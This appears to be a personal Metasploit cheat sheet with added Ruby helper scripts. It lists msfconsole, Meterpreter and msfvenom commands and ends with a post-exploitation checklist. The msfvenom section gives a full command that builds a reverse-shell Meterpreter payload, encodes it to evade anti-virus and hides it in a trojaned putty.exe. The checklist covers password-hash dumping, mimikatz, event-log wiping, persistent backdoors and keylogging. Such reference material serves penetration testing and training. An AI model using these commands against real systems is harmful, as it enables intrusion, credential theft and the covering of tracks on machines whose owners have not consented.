A collection of commonly used Metasploit commands, based on my own reading of the official documentation.


msfconsole commands

back: leave the current module and return to the top-level prompt

banner: display an MSF banner

check: test whether the current target is vulnerable to the selected exploit without actually running the exploit (only for modules that implement a check)

show options: list the options of the currently selected module

connect: open a raw connection to a remote host, given ip and port (a small netcat-like client)

edit: open the source of the current module in vim (or $EDITOR) and edit it

exit: leave msfconsole

grep: like grep on Linux, filter the output of another command for a pattern, e.g. grep http search oracle

info: show the details of the current module

irb: drop into an interactive Ruby shell with the framework loaded, for dynamic interaction and prototyping Metasploit scripts

jobs: list and manage background jobs (jobs -h for the options)

kill <job id>: terminate the job with that ID

load: load a plugin from Metasploit's plugin directory

loadpath: add modules from another directory (e.g. third-party modules) by path

unload: unload a plugin

resource: run a resource script, a file of msfconsole commands one per line, through msfconsole; this is how you batch operations

route: add a route, sending traffic for a network through an existing session (pivoting)

search: find modules you want to look at or use

help search (or search -h): show the search options

search name:<keyword>: search by module name

search platform:<platform>: narrow the search by platform

search type:<type>: narrow the search by module type, such as auxiliary, post, exploit

search author:<author>: search by author

search name:<x> author:<y> platform:<z>: combine several filters to narrow the results

sessions: session management; sessions -l lists the open sessions

sessions -i <id>: interact with the session with that ID, which drops you into its shell

set: set an option or parameter of the current module

unset: remove an option you have set

setg/unsetg: set/remove global options; a global option (e.g. LHOST) applies to every module and saves retyping

save: save the current configuration (datastore) so it is restored on the next start

auxiliary: auxiliary modules (scanners, denial-of-service modules, fuzzers)

exploits: exploit modules, the core of Metasploit, covering a large number of vulnerabilities

payloads: payloads

Inside an exploit module, show targets lists the targets the exploit supports

show advanced: list the advanced options

show nops: list the NOP generators Metasploit provides

MSF payloads

Stager: establishes the communication channel between attacker and victim and then reads the stage (the second-stage payload) from the attacker

Meterpreter: loaded by DLL injection, lives entirely in memory and writes nothing to disk, so traditional disk forensics has a hard time finding it

PassiveX: helps bypass restrictive outbound firewalls. It creates a hidden instance of Internet Explorer through an ActiveX control and uses it to communicate with the attacker over HTTP requests and responses.

NoNX: circumvents DEP (Data Execution Prevention), which on CPUs that support it prevents code from running in certain memory regions

Reflective DLL injection: injects the stage into the memory of a running host process without touching the host's disk; both the VNC and Meterpreter stages use it

Generating payloads

With a payload (or an exploit and its payload) selected, generate with no options produces the raw shellcode.

generate -b '\x00' encodes the shellcode so that the listed bad characters (here the null byte) do not appear in it. Note that encoding makes the shellcode larger, not smaller, because a decoder stub is prepended; what it buys you is shellcode that survives a string copy or protocol that would stop at a null byte.
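As an added example (it is not code from the original page or from the Metasploit project), here is a small Ruby check for the bad characters that generate -b and msfvenom -b are meant to eliminate: it parses the same '\x00\x0a' notation, scans a shellcode blob for those bytes and reports their offsets, which tells you whether encoding is needed at all. The function names are mine, and the sample shellcode bytes are constructed for illustration, not a real payload.

```ruby
# Parse a bad-character list in the notation used by `generate -b` / `msfvenom -b`.
# Both the escaped text form typed at the prompt ('\x00\x0a') and a raw byte
# string ("\x00\x0a") are accepted; either way a list of byte values comes back.
def parse_badchars(spec)
  spec = spec.b # treat as raw bytes so high bytes cannot trip the regex
  if spec =~ /\A(\\x[0-9a-fA-F]{2})+\z/
    spec.scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |hex| hex.to_i(16) }
  else
    spec.bytes
  end
end

# Scan a shellcode blob for bad characters.
# Returns an array of [offset, byte] pairs; an empty array means the blob is
# clean and can be used without an encoder.
def find_badchars(shellcode, badchar_spec)
  bad = parse_badchars(badchar_spec)
  hits = []
  shellcode.each_byte.with_index do |byte, offset|
    hits << [offset, byte] if bad.include?(byte)
  end
  hits
end

# Human-readable summary, handy before deciding whether -b is needed.
def badchar_report(shellcode, badchar_spec)
  hits = find_badchars(shellcode, badchar_spec)
  return 'clean: no bad characters found' if hits.empty?
  hits.map { |off, b| format('0x%02x at offset %d', b, off) }.join(', ')
end

# Constructed sample (not a real payload): xor eax,eax; push eax;
# push 0x0d0a0000; nop. The immediate of the push carries two null bytes
# plus CR/LF, exactly the bytes a strcpy- or HTTP-based delivery would mangle.
SAMPLE_SHELLCODE = "\x31\xc0\x50\x68\x00\x00\x0a\x0d\x90".b

if __FILE__ == $PROGRAM_NAME
  puts badchar_report(SAMPLE_SHELLCODE, '\x00\x0a\x0d')
end
```

Feed it the raw output of generate (or msfvenom -f raw) and the same bad-character string you would pass to -b; if the report is clean you can skip the encoder and keep the payload small.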

Meterpreter commands

background: switch from the Meterpreter session back to the msfconsole prompt while keeping the session open

clearev: clears the Application, System and Security event logs on a Windows target; takes no options or arguments

download: download a file from the target; in Windows paths, write each backslash doubled (\\)

edit: open a file on the target in vi and edit it

execute: run a program on the target, e.g. execute -f cmd.exe -i -H (interactive, with the window hidden)

getuid: show the user the Meterpreter server is running as

hashdump: dump the contents of the SAM database (password hashes)

idletime: show how long the user on the remote machine has been idle

lpwd: print the local (attacker-side) working directory

lcd: change the local working directory, so files on the attacker side can be referred to with relative paths

ps: list the processes running on the target

search: search the target for files, either the whole system or a given directory (-d); the file name pattern (-f) accepts wildcards

shell: drop into a native shell on the target

upload: upload a file or directory to the target

webcam_list: run from the Meterpreter shell, lists the webcams available on the target

webcam_snap: takes a JPEG snapshot with one of the target's webcams and saves it

execute: run a file on the target

getwd: get the current working directory on the target (pwd does the same)

download: download a file from the target to the attacking machine

route: show the target's routing table

portfwd: Meterpreter's built-in port forwarder, mapping a local port to a port on a host reachable from the target

ps: list processes with ps

migrate <pid>: move the Meterpreter session from its current process into the memory space of another process; as long as that process keeps running, the session stays alive

python_execute

The following commands run inside the Meterpreter session, after the Python extension has been loaded with load python

python_execute <python statements>: run Python code on the target

python_execute "import os; cd = os.getcwd()" -r cd: -r prints the named variable after the code has run

python_import -f <path>: load a Python file into Meterpreter's Python interpreter; -f specifies the file

Port scanning

RHOSTS accepts a single IP, IP ranges (e.g. 192.168.1.1-10), CIDR ranges, several of these separated by commas, and a host list file (file:<path>) with one entry per line

THREADS is the number of concurrent scanner threads. The default is 1, with some rules of thumb: keep it under 16 on native Win32, under 200 when MSF runs under Cygwin, and on Linux/Unix-like systems it can be set as high as 256
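To make the RHOSTS forms above concrete, here is an added Ruby helper (my own code, not the page's or Metasploit's; the framework does this in Rex::Socket::RangeWalker, which accepts a few more forms) that expands a RHOSTS-style string into individual IPv4 addresses. The function names, the file: prefix handling and the injectable file reader are assumptions of this example; the host-list contents in the usage are constructed.

```ruby
require 'ipaddr'

# Expand an RHOSTS-style target specification into a list of IPv4 addresses.
# Forms handled:
#   single address        192.168.1.5
#   CIDR block            192.168.1.0/30
#   dashed range          192.168.1.10-20  or  192.168.1.10-192.168.1.20
#   comma-separated list  192.168.1.1, 10.0.0.0/31
#   host list file        file:/path/to/hosts.txt  (one entry per line, # comments)
# file_reader is injectable so the file form can be exercised without touching disk.
def expand_rhosts(spec, file_reader: ->(path) { File.read(path) })
  hosts = []
  spec.split(',').map(&:strip).reject(&:empty?).each do |entry|
    if entry.start_with?('file:')
      file_reader.call(entry.delete_prefix('file:')).each_line do |line|
        line = line.sub(/#.*/, '').strip
        hosts.concat(expand_rhosts(line, file_reader: file_reader)) unless line.empty?
      end
    elsif entry.include?('/')
      # to_range covers every address in the block, network and broadcast included,
      # which is what a scanner wants to probe
      hosts.concat(IPAddr.new(entry).to_range.map(&:to_s))
    elsif (m = entry.match(/\A(\d{1,3}(?:\.\d{1,3}){3})-(\S+)\z/))
      first = IPAddr.new(m[1])
      # "a.b.c.d-e" means the last octet runs from d to e
      last_str = m[2].include?('.') ? m[2] : m[1].sub(/\d+\z/, m[2])
      last = IPAddr.new(last_str)
      raise ArgumentError, "range end precedes start: #{entry}" if last < first
      hosts.concat((first..last).map(&:to_s))
    else
      hosts << IPAddr.new(entry).to_s # IPAddr rejects anything that is not an address
    end
  end
  hosts.uniq
end

# Sanity check before a sweep: how many targets a spec expands to.
def rhosts_count(spec, **opts)
  expand_rhosts(spec, **opts).size
end

if __FILE__ == $PROGRAM_NAME
  # Constructed host list standing in for a file on disk.
  fake_file = ->(_path) { "10.1.1.1   # domain controller\n\n10.1.1.0/31\n" }
  puts expand_rhosts('192.168.1.0/30, 10.0.0.5-7, file:/tmp/hosts.txt', file_reader: fake_file)
  puts "targets: #{rhosts_count('172.16.0.0/28')}"
end
```

Running the count before setting THREADS is worth the few seconds: a typo such as /8 instead of /28 turns a sweep into sixteen million hosts.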

db_nmap: run an Nmap scan and store the results in the database

Alternatively run nmap -oA <basename>, which writes three output files (.nmap, .gnmap and .xml), and import the XML into the database with db_import

search portscan: list the port scanners available in the framework

auxiliary/scanner/smb/smb_version: detects the operating system version and hostname of the target

auxiliary/scanner/ip/ipidseq: scans the network for idle hosts with a predictable (incremental) IP ID sequence; such a host can be used as a zombie to scan other hosts on your behalf, so the probes never come from your own address

With a zombie found by ipidseq, run an Nmap idle scan: nmap -Pn -sI <zombie ip> <target ip>
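What ipidseq actually decides is whether a host's IP ID counter is predictable enough to act as a zombie. The added Ruby example below (my own code, not the page's or the module's) classifies a sequence of observed IP IDs; the class names mirror what ipidseq and Nmap print, but the thresholds and the function names are assumptions of this example, and the sample sequences are constructed.

```ruby
# Classify a sequence of IP IDs observed in successive responses from one host.
# Simplified classifier: the labels follow ipidseq/nmap, the thresholds are
# this example's own choice, not the tools' exact rules.
IPID_STEP_MAX = 10 # largest per-packet increment still treated as "incremental"

def ipid_diffs(ids)
  ids.each_cons(2).map { |a, b| (b - a) % 65_536 } # 16-bit wrap-around
end

def classify_ipid(ids)
  raise ArgumentError, 'need at least 3 samples' if ids.size < 3
  return :all_zeros if ids.all?(&:zero?)
  diffs = ipid_diffs(ids)
  return :constant if diffs.all?(&:zero?)
  return :incremental if diffs.all? { |d| d.between?(1, IPID_STEP_MAX) }
  # Some Windows stacks put the 16-bit ID on the wire byte-swapped; undo that
  # and look again.
  swapped = ids.map { |i| ((i & 0xff) << 8) | ((i >> 8) & 0xff) }
  if ipid_diffs(swapped).all? { |d| d.between?(1, IPID_STEP_MAX) }
    return :broken_little_endian
  end
  # Every step forward (as a signed 16-bit delta) but by unpredictable amounts.
  return :random_positive if diffs.all? { |d| d < 32_768 }
  :random
end

# A zombie for an idle scan must have an incrementing IP ID: every packet it
# sends adds one step, so one extra step during the probe means the target
# answered the spoofed SYN with a SYN/ACK (port open). Random or constant IDs
# carry no such signal.
def usable_zombie?(ids)
  %i[incremental broken_little_endian].include?(classify_ipid(ids))
end

# Constructed samples, six probes per host, as ipidseq collects them.
SAMPLES = {
  '192.168.1.109' => [40_201, 40_202, 40_203, 40_204, 40_205, 40_206],
  '192.168.1.110' => [0, 0, 0, 0, 0, 0],
  '192.168.1.111' => [5_932, 43_118, 12_005, 61_900, 2_237, 30_101],
}.freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each do |host, ids|
    puts "#{host}: #{classify_ipid(ids)}#{usable_zombie?(ids) ? ' (usable zombie)' : ''}"
  end
end
```

The ordering matters: the byte-swapped check only runs after the plain incremental check fails, otherwise a normal incrementing host would never be reported as such.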

Using Metasploit to find vulnerable MSSQL systems (Microsoft SQL Server)

auxiliary/scanner/mssql/mssql_ping finds live MSSQL servers (it queries the SQL Server Resolution Service on UDP 1434, so it also reveals instances listening on non-default TCP ports). Once you have credentials, auxiliary/admin/mssql/mssql_exec runs commands on the server through xp_cmdshell. Credentials can be brute-forced with the framework's mssql_login scanner or with tools like THC-Hydra and Medusa

Service identification

auxiliary/scanner/ssh/ssh_version identifies the SSH service (port 22) and auxiliary/scanner/ftp/ftp_version the FTP service (port 21) from their banners

Extending psnuffle

psnuffle's protocol modules live in data/exploits/psnuffle; each file is named after the protocol it parses and consists mostly of regular expressions that match that protocol's authentication exchange

SNMP sweeping

Metasploit ships with SNMP auxiliary modules, including one dedicated to sweeping for SNMP devices. To test against a local snmpd (Debian/Ubuntu), first edit /etc/default/snmpd: the line SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1' binds the daemon to localhost, so by default only local SNMP queries are answered.

Change the trailing 127.0.0.1 to 0.0.0.0 so snmpd listens on all interfaces, then restart the service.
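To make that edit reviewable rather than a blind search-and-replace, here is an added Ruby helper (my own code, not the page's or Metasploit's) that rewrites only the SNMPDOPTS line and returns the new file text, so you can diff it before writing it back. The function name is mine, and the sample file contents are constructed to match the stock Debian layout quoted above; restarting snmpd afterwards is left to you.

```ruby
# Rewrite the SNMPDOPTS line of /etc/default/snmpd so snmpd listens on all
# interfaces instead of 127.0.0.1 only. Works on the file's text and returns
# the new text; raises if there is no SNMPDOPTS line to change.
def rebind_snmpd(contents, bind_addr = '0.0.0.0')
  found = false
  lines = contents.each_line.map do |line|
    m = line.match(/\A\s*SNMPDOPTS=(['"])(.*)\1\s*\z/)
    next line unless m
    found = true
    quote = m[1]
    args = m[2].split
    # The listen address is the trailing argument: replace it when present,
    # append one otherwise. Running this twice is therefore a no-op.
    if args.last =~ /\A\d{1,3}(\.\d{1,3}){3}\z/
      args[-1] = bind_addr
    else
      args << bind_addr
    end
    "SNMPDOPTS=#{quote}#{args.join(' ')}#{quote}\n"
  end
  raise ArgumentError, 'no SNMPDOPTS line in input' unless found
  lines.join
end

# Constructed /etc/default/snmpd in the shape of the stock Debian file.
SNMPD_DEFAULT = <<~CONF
  # This file controls the activity of snmpd and snmptrapd
  SNMPDRUN=yes
  SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1'
  TRAPDRUN=no
CONF

if __FILE__ == $PROGRAM_NAME
  # Real use: File.write('/etc/default/snmpd', rebind_snmpd(File.read('/etc/default/snmpd')))
  # and then restart snmpd.
  puts rebind_snmpd(SNMPD_DEFAULT)
end
```

Binding to 0.0.0.0 is fine on a lab box you are about to sweep; on anything else, remember that the community strings in snmpd.conf are now reachable from the network too.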

SNMP queries address objects in the MIB (Management Information Base), the tree of variables that lets you query a device and extract information; Metasploit loads its MIB list from the database by default

search snmp: list the available SNMP scanning modules

Writing your own security scanner

To be covered in detail later

msfvenom

Required options: -p and -f

-p: specify the payload; its options follow as key=value pairs, e.g. lhost=... lport=... (the payload's options list shows what it needs)

-f: specify the output format of the payload

-b: specify the bad characters to avoid; msfvenom then picks an encoder automatically

-e: choose the encoder module

-i: number of encoding iterations; encoding several times can in some cases get past anti-virus software

msfvenom --help-formats: list the output formats msfvenom supports

msfvenom -l payloads: list the payloads

msfvenom -l encoders: list the encoders

msfvenom -l nops: list the NOP generators (used for padding and, combined with encoding, sometimes for AV evasion)

Payload that connects back to a Meterpreter handler:

msfvenom -p windows/meterpreter/reverse_tcp lhost=<your IP> lport=444 -f exe -o payload.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -x /root/Download/putty.exe -k -f exe -o /root/Desktop/putty_evil.exe

Here -x uses an existing executable as the template and -k keeps the template's original behaviour, running the payload in a separate thread. Whichever variant you build, the handler must be started with the same payload, lhost and lport.

Using Meterpreter in post-exploitation

0x01 Privilege escalation

getuid shows the current user; getsystem tries to elevate to SYSTEM

0x02 Finding domain admins

use post/windows/gather/enum_domain

0x03 Grabbing passwords

load mimikatz (in current versions the extension is called kiwi: load kiwi)

post/windows/gather/hashdump

0x04 Log cleanup

clearev

0x05 Backdoor

run metsvc installs the Meterpreter service as a persistent backdoor; connect back to it with

exploit/multi/handler

set payload windows/metsvc_bind_tcp

run persistence installs a backdoor that survives reboots by adding an autostart entry

0x06 Keylogger

keyscan_start

keyscan_dump

keyscan_stop

0x07 Process injection

migrate <pid> (see above)

0x08 Screenshot

load espia

screengrab (from espia) or screenshot (from stdapi) captures the target's screen
